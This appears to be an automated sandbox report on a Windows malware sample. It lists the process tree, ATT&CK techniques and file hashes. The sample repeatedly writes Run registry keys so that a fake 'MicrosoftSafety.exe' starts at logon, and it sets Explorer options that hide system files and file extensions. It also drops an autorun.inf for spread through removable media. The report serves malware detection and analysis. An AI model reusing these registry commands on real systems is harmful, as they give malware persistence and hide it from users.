- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4908
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:916
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1556
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2728
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3680
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4444
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4836
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4284
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2988
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2552
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2476
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1284
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:632
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:380
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1716
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3280
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:5056
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4616
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4972
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2976
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2880
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3252
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1288
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4480
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3596
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1340
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:216
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3564
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2876
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2160
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    PID:844
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1304
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1752
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4636
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:620
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2308
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2536

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4080

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program File\Microsoft\MicrosoftSafety.exe

Filesize
184KB

MD5
60efc166f50444a0e8b6b8c1dbfbff40

SHA1
588a9c2580ca4cc27f87af4118a174f550ab7f25

SHA256
381e4b36e1863d0ab77ce5ca89c472fa638c39fc5e55c1d51414f1621a8f9b09

SHA512
3586991f82378a21fde9eed637609fe650221c796ff9239209e670993c41a5c06a0980d83097a69860449ee1d0b5ea5fbfaa40ae2096f987a85696c08a0b6375

Download Submit
C:\autorun.inf

Filesize
87B

MD5
a58e87ffeec377bdfe74aa489e222618

SHA1
ce4755bf320611f95b2e6fd8128a95d22b2680da

SHA256
fd5ee8d0b5bfe9e3d8e7088253d80602c554d62d2ee69ad9270722c251d6eff0

SHA512
1e5cf2c04ecc7e16dd26020c73a8a47059cce08f8224632621818d62dd00f928a1829e385db4cfbda1dc438dcc1187903556dd483d5786ebe6cfad915a459c66

Download Submit
memory/3204-201-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/3204-132-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads